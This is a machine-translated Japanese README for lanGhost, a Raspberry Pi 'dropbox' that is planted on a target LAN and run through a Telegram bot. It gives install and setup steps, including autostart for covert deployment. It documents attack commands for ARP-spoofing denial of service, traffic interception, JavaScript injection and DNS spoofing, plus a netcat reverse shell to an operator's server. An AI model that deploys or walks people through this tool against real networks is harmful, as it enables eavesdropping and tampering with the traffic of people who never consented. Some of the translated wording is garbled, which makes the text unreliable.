Langhostは、 Raspberry Pis (RPI用のRaspbian / Kali )用に設計されています。他の/デスクトップディストリビューションでそれを実行すると、問題が発生する可能性があり、例外としては機能しない場合があります。
SDカードに新鮮なRaspbian/Kaliが付いたRaspberry Piが必要になります。
Piを起動し、SSHの販売またはキーボードを接続して、これらのコマンドを入力します。
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
セットアップスクリプトの実行中に質問/メッセージをお読みください!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
スキャンに時間がかかりすぎるため、 /24よりも大きなネットワークでLanghostを使用することはお勧めしません。
ランゴーストは静かではありません。トラフィックを監視している人は誰でもARPパケットを見ることができます!
step 4/4 (autostart)
でyes
を選択した場合、PIはドロップするために完全にセットアップされます。 Langhostはブーツで起動し、テキストでTelegramにメッセージを送信する必要があります: lanGhost started! ?
。
最初にラボで試してみて、Langhostがあなたのメッセージに応答しているかどうかをテストしてください!
すべてが設定されている場合は、イーサネットケーブルをPIにプラグインしてマイクロUSBを介して電源を接続して、ターゲットネットワークに接続するだけで、準備ができています。
(LanghostはWiFiでも動作する可能性がありますが、最初に自動的にネットワークに接続するためにwpa_supplicant
セットアップする必要があります)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
これらのコマンドのいずれかを使用して、攻撃を開始できます: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
1つ以上の攻撃が実行されている場合、 /attack
コマンドを使用して、 ATTACK-ID
を含むそれらのリストを取得できます。
攻撃タイプを停止する/stop [ATTACK-ID]
。
/reversesh
暗号化されておらず、すべてのトラフィックを監視できるNetCat TCP接続のみを作成します!必要に応じて、緊急修正または暗号化された逆接続のセットアップにのみ使用してください。
/reversesh
コマンドは、外側からアクセスできない場合、PIでリバースシェルを取得するためのものです。
/reversesh
コマンドを使用するには、シェルをリスニングするサーバーに必要です。
サーバーでリスナーを起動するためのnetcatコマンド:
$ nc -l 0.0.0.0 [PORT]
電報コマンド:
/reversesh [IP-of-your-listening-server] [PORT]
/kill
- ターゲットのインターネット接続を停止します。/mitm
ターゲットからHTTPおよびDNSトラフィックをキャプチャし、テキストメッセージで送信します。/replaceimg
ターゲットのHTTP画像をボットに送信する画像に置き換えます。/injectjs
ターゲットのすべてのHTTP HTML応答にJavaScriptを注入します。サーバー上のJSファイルをホストし、URLをパラメーターとして指定する必要があります。/spoofdns
-ターゲットのDNS応答をスプーフィングします。すべての攻撃では、 ARPスプーフィングを使用しています!
/scan
- ローカルネットワークをスキャンし、ホストをオンラインで返します。 nmap -sn
スキャンを使用して、ホストを発見します。/scanip
オープンポートやその他の情報のIPアドレスをスキャンします。 nmap -sS
スキャンを使用します。新しいデバイスがネットワークを接続/離れるたびにメッセージが表示されます。
DavidSchützによるCopyright(c)2018。一部の権利は予約されています。
Langhostは、ライセンスファイルに記載されているすべての説明に従って、MITライセンスの条件の下にあります。また、先に進み、Xdavid {at} protonmail {dot} comにメールを送信することもできます。